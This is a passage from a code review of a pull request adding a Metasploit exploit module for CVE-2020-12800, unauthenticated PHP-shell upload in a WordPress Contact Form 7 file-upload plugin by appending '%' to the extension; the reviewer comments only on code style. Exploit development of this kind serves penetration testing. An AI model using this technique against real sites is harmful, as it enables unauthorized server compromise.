modules/exploits/multi/http/wp_dnd_mul_file_rce.rb

```diff
@@ -0,0 +1,161 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::FileDropper
+  include Msf::Exploit::Remote::HTTP::Wordpress
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Wordpress Drag and Drop Multi File Uploader RCE',
+        'Description' => %q{
+          This module exploits a file upload feature of Drag and Drop Multi File
+          Upload - Contact Form 7.  However, the allowed file extension list can
+          be bypassed by appending a %, allowing for php shells to be uploaded.
+          No authentication is required for exploitation.
+        },
+        'License' => MSF_LICENSE,
+        'Author' =>
+          [
+            'h00die', # msf module
+            'Austin Martin <amartin@amartinsec.com>' # original PoC, discovery
+          ],
+        'References' =>
+          [
+            [ 'EDB', '48520' ],
+            [ 'CVE', '2020-12800' ],
+            [ 'URL', 'https://github.com/amartinsec/CVE-2020-12800']
+          ],
+        'Platform' => ['php'],
+        'Privileged' => false,
+        'Arch' => ARCH_PHP,
+        'Targets' =>
+          [
+            [ 'Automatic Target', {}]
+          ],
+        'DisclosureDate' => 'May 11 2020',
+        'DefaultTarget' => 0
+      )
+    )
+    register_options(
+      [
+        Opt::RPORT(80),
+        OptString.new('TARGETURI', [ true, 'The URI of Wordpress', '/'])
+      ], self.class
+    )
+  end
+
+  # recursively search uploads folder(s) to find our payload
+  def find_payload(path, payload_name)
+    unless @payload_location.nil?
+      return
+    end
```

Comment:
Even if you're not a fan of single line conditionals, it is usually acceptable for a guard clause.

```suggestion
    return unless @payload_location.nil?
```